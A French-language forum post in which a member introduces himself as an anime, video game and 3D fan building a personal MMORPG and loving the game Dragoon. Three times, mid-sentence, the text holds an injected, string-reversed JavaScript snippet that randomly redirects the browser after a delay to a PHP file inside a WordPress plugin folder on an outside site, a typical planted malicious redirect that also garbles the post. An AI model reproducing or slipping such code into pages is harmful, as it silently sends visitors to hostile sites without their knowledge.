Giuliani

Présentation des nouveaux membres
Répondre
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Giuliani

Message par giuliani »

Bonjour à tous,

Je me présente Giuliani, 32 piges bientôt, Nordiste d'origine et Toulousain désormais.
Gros fan de Jap'animation, de jeux vidéo et de 3D, je bosse depuis quelques années à la réalisation d'un projet perso de MMORPG (inspiré de l'univers de Toriyama à savoir Dragon Ball, Dragon Quest et Dr Slump):
http://www.dispersions.fr/

Je suis un gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and fan de Dragoon que j'avais découvert par hasard le jour de sa sortie sur Playstation et depuis il "hante mes fantasmes" (j'écoute sa b$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande son qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and je bosse sur la 3D, c'est dire^^)